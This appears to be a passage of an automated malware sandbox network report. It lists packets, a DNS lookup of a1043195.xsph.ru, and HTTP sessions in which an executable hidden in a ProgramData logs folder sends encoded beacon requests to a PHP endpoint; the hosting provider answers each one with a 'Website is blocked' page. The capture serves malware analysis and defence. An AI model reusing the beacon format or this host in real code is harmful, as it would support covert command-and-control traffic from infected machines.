Nov 24, 2024 04:04:04.196028948 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.199702978 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.199796915 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.199839115 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.203541040 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.203632116 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.203672886 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.207325935 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.250701904 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.298197031 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.298218966 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.298263073 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.299333096 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.299458981 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.299504042 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.303160906 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.303266048 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.303309917 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.306958914 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.307065964 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.307111025 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.310794115 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.310899019 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.310941935 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.314599991 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.314723969 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.314765930 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.318404913 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.318528891 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.318569899 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.322240114 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.322341919 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.322380066 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.326081991 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.326159954 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.326200008 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.329885960 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.329988003 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.330041885 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.333662987 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.333795071 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.333844900 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.337506056 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.337614059 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.337656975 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.341341019 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.341464043 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.341507912 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.345145941 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.345246077 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.345292091 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.348978996 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.349047899 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.349092007 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.413402081 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.413546085 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.413589954 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.415210962 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.415287018 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.415323973 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.508866072 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.512451887 CET	49955	80	192.168.2.5	141.8.192.93

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2024 04:02:03.192178011 CET	62098	53	192.168.2.5	1.1.1.1
Nov 24, 2024 04:02:03.707969904 CET	53	62098	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 24, 2024 04:02:03.192178011 CET	192.168.2.5	1.1.1.1	0x6f82	Standard query (0)	a1043195.xsph.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 24, 2024 04:02:03.707969904 CET	1.1.1.1	192.168.2.5	0x6f82	No error (0)	a1043195.xsph.ru		141.8.192.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

a1043195.xsph.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	141.8.192.93	80	7304	C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 04:02:03.836081982 CET	556	OUT	GET /e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: a1043195.xsph.ru Connection: Keep-Alive
Nov 24, 2024 04:02:05.192620039 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:02:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
Nov 24, 2024 04:02:05.192779064 CET	1236	IN	Data Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-i
Nov 24, 2024 04:02:05.192797899 CET	448	IN	Data Raw: 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61 Data Ascii: t:700;font-size:38px;line-height:100%;margin-bottom:16px;white-space:pre-line}.wrapper .content .right-side{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display
Nov 24, 2024 04:02:05.192815065 CET	1236	IN	Data Raw: 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 Data Ascii: -box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-align-content:center;-ms-flex-line-pack:center;align-content:center}.wrapper .content .footer__logo svg,.wrapper .content .right-side .image-container img{width:inherit;heigh
Nov 24, 2024 04:02:05.192841053 CET	1236	IN	Data Raw: 74 6f 6d 3a 35 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 36 31 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 31 30 35 70 78 29 20 61 6e 64 20 28 6d Data Ascii: tom:52px;position:absolute;right:61px}}@media screen and (max-width:1105px) and (max-height:720px){.wrapper .content .right-side{display:none}}@media screen and (max-width:1105px){.wrapper .content .right-side .image-container-xs{display:block
Nov 24, 2024 04:02:05.192857981 CET	448	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 74 69 74 6c 65 22 3e d0 a1 d0 b0 d0 b9 d1 82 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 3c 2f 68 31 Data Ascii: <h1 class="error-block__title"> </h1> <p class="error-block__desc">, </p> </div> </div>
Nov 24, 2024 04:02:05.192873001 CET	1236	IN	Data Raw: 74 3d 22 33 38 34 22 20 76 69 65 77 62 6f 78 3d 22 30 20 30 20 33 32 38 20 33 38 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 61 6c 74 3d 22 Data Ascii: t="384" viewbox="0 0 328 384" fill="none" xmlns="http://www.w3.org/2000/svg" alt="Sprinthost"> <g clip-path="url(#clip0)"> <path d="M146.372 73.0738C139.869 78.4204 129.541 78.8023 122.846 73.4557C121.89 72.6919 120.551 74.0285 121
Nov 24, 2024 04:02:05.192893028 CET	1236	IN	Data Raw: 32 39 35 33 20 31 35 38 2e 39 39 35 20 38 35 2e 34 38 36 33 43 31 35 38 2e 30 33 39 20 38 36 2e 30 35 39 31 20 31 35 37 2e 36 35 37 20 38 37 2e 35 38 36 37 20 31 35 38 2e 32 33 20 38 38 2e 39 32 33 34 43 31 35 38 2e 36 31 33 20 38 39 2e 36 38 37 Data Ascii: 2953 158.995 85.4863C158.039 86.0591 157.657 87.5867 158.23 88.9234C158.613 89.6872 159.187 90.26 159.569 90.8329C159.761 91.0238 160.717 92.1695 160.908 92.3605C163.777 95.2247 164.733 96.5614 165.881 99.6166C164.542 100.38 163.203 101.144 16
Nov 24, 2024 04:02:05.192908049 CET	1236	IN	Data Raw: 43 31 39 35 2e 37 31 38 20 39 34 2e 38 34 32 33 20 31 39 31 2e 38 39 33 20 39 33 2e 33 31 34 37 20 31 38 38 2e 32 35 39 20 39 31 2e 37 38 37 31 43 31 38 37 2e 38 37 36 20 39 31 2e 35 39 36 32 20 31 38 37 2e 33 30 33 20 39 31 2e 39 37 38 31 20 31 Data Ascii: C195.718 94.8423 191.893 93.3147 188.259 91.7871C187.876 91.5962 187.303 91.9781 187.111 92.36C186.92 92.9328 187.303 93.3147 187.685 93.5057C191.319 95.0333 195.145 96.5609 198.779 98.0885C199.161 98.2794 199.735 97.8975 199.926 97.5156C200.1
Nov 24, 2024 04:02:05.192925930 CET	1236	IN	Data Raw: 2e 36 36 34 33 20 32 31 35 2e 34 31 39 20 32 35 2e 35 32 38 35 20 32 30 35 2e 32 38 32 20 32 39 2e 39 32 30 34 43 31 39 39 2e 39 32 36 20 33 32 2e 32 31 31 38 20 31 39 34 2e 37 36 32 20 33 34 2e 38 38 35 31 20 31 38 39 2e 35 39 38 20 33 37 2e 33 Data Ascii: .6643 215.419 25.5285 205.282 29.9204C199.926 32.2118 194.762 34.8851 189.598 37.3674C184.625 39.8498 179.461 42.3321 174.105 43.6688C168.176 45.0054 161.864 44.8145 155.744 44.2416C157.274 40.4226 159.761 36.9855 163.203 34.6941C163.968 34.12
Nov 24, 2024 04:02:05.345923901 CET	1236	IN	Data Raw: 34 33 2e 33 34 35 20 38 33 2e 34 34 35 38 20 31 34 33 2e 35 33 36 20 38 33 2e 34 34 35 38 20 31 34 33 2e 37 32 37 43 37 39 2e 30 34 36 37 20 31 34 37 2e 39 32 38 20 37 33 2e 36 39 31 32 20 31 35 32 2e 35 31 20 36 38 2e 39 30 39 36 20 31 35 35 2e Data Ascii: 43.345 83.4458 143.536 83.4458 143.727C79.0467 147.928 73.6912 152.51 68.9096 155.757C64.893 150.028 60.4939 144.681 55.7123 139.526C53.2259 136.853 48.0617 130.933 47.8705 130.933C45.9578 127.687 43.8539 126.541 41.75 124.441C39.0723 121.958
Nov 24, 2024 04:02:05.628359079 CET	532	OUT	GET /e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: a1043195.xsph.ru
Nov 24, 2024 04:02:06.064641953 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:02:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.5	49732	141.8.192.93	80

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 04:02:24.701626062 CET	595	OUT	GET /e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: a1043195.xsph.ru Connection: Keep-Alive
Nov 24, 2024 04:02:26.104630947 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:02:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
Nov 24, 2024 04:02:26.104671955 CET	224	IN	Data Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inlin
Nov 24, 2024 04:02:26.104686975 CET	1236	IN	Data Raw: 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 3b 2d Data Ascii: e-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-flex-direction:column;-moz-box-orient:vertical;-moz-box-direction:normal;-ms-flex-direction:column;flex-direction:column}.wra
Nov 24, 2024 04:02:26.104712009 CET	1236	IN	Data Raw: 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 Data Ascii: webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;height:100%;max-width:328px;max-height:384px;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-m
Nov 24, 2024 04:02:26.104753017 CET	1236	IN	Data Raw: 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 33 38 25 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67 Data Ascii: t-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77px}.wrapper .content .right-side{top:unset;bottom:52px;position:a
Nov 24, 2024 04:02:26.104772091 CET	1236	IN	Data Raw: 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 33 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p> <h1 c
Nov 24, 2024 04:02:26.104876041 CET	896	IN	Data Raw: 31 39 39 20 37 34 2e 36 30 32 20 31 38 39 2e 39 38 20 37 33 2e 30 37 34 33 43 31 39 33 2e 38 30 36 20 37 31 2e 39 32 38 36 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34 20 31 39 38 2e 30 31 34 20 36 35 2e 32 34 35 34 43 31 39 38 2e 35 38 37 20 Data Ascii: 199 74.602 189.98 73.0743C193.806 71.9286 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.9985C167.602 98.2799 168.55
Nov 24, 2024 04:02:26.104892969 CET	1236	IN	Data Raw: 20 31 36 33 2e 32 30 33 20 31 30 31 2e 31 34 34 20 31 36 31 2e 38 36 34 20 31 30 31 2e 39 30 38 43 31 36 30 2e 39 30 38 20 31 30 32 2e 34 38 31 20 31 36 31 2e 36 37 33 20 31 30 34 2e 31 39 39 20 31 36 32 2e 38 32 31 20 31 30 33 2e 36 32 37 43 31 Data Ascii: 163.203 101.144 161.864 101.908C160.908 102.481 161.673 104.199 162.821 103.627C165.69 101.908 169.133 101.526 172.193 102.672C173.34 103.054 173.914 101.144 172.767 100.762Z" fill="black"/> <path d="M141.208 97.1331C138.721 99.8064 1
